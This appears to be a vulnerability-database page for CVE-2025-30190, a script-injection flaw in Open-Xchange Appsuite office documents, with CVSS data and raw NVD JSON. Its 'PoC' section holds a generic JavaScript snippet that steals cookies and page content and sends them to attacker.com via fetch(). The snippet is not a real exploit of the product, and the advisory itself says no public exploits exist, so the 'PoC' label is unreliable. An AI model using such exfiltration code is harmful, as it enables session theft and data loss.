Security Vulnerability Report
CVE-2025-30190 CVSS 5.4 MEDIUM

Published: 2025-11-27 10:15:52
Last Modified: 2026-04-15 00:35:42

Description

Malicious content in office documents can be used to inject script code when editing a document. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open-Xchange Appsuite: all unpatched versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Example of JavaScript code embedded in a malicious Office document -->
<script>
  // Steal the user's session token
  var sessionToken = document.cookie;
  // Send the stolen data to the attacker's server
  fetch('https://attacker.com/steal?data=' + btoa(sessionToken), {
    method: 'GET',
    mode: 'no-cors'
  });
  // Read the document content and exfiltrate it
  var docContent = document.body.innerHTML;
  fetch('https://attacker.com/exfil?content=' + btoa(docContent), {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({content: docContent})
  });
</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30190", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:51.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content at office documents can be used to inject script code when editing a document. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}